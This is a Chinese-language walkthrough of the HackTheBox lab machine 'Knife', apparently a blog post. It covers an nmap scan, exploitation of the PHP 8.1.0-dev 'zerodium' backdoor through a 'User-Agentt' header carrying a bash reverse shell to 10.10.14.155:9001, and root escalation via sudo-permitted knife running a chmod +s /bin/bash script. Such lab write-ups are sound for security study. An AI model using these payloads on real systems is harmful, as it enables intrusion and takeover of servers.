Knife

主机信息

在这里插入图片描述
在这里插入图片描述

服务枚举

nmap -sC -sV 10.10.10.242

在这里插入图片描述
看到对应主机开放了80端口,我们上去访问了一下页面
在这里插入图片描述
看了下页面的功能和源码,也没发现什么突破点。扫了下目录,也没有发现啥信息
在这里插入图片描述

抓包分析

因为没有思路了,我使用burpsuite进行抓包调试时,发现了X-Powered-By的对应值为PHP/8.1.0-dev。在网上搜索到对应的资料显示PHP/8.1.0-dev存在一个开发后门,加入User-Agentt字段并添加zerodium函数名作为对应值,就能实现RCE漏洞。
在这里插入图片描述
我们在User-Agentt字段中添加zerodiumsystem("/bin/bash -c 'bash -i >&/dev/tcp/10.10.14.155/9001 0>&1'")这个值
在这里插入图片描述
在这里插入图片描述

至此我们获取到了一个普通账户的权限,得到第一个flag值
在这里插入图片描述
然后就是我们的提权重头戏了,首先我们先看看sudo -l大概的信息。这里的意思是knife用户可以使用root身份来运行/usr/bin/knife这条命令
在这里插入图片描述
因此我们将要执行的恶意代码写入exploit.rb文件中。echo "system('chmod +s /bin/bash')">exploit.rb
在这里插入图片描述
chmod的+s选项是在文件执行时把进程的属主或组ID置为该文件的文件属主。执行这个文件将权限提升为root权限
在这里插入图片描述
查看到最后的root的flag值
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

平凡的学者

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值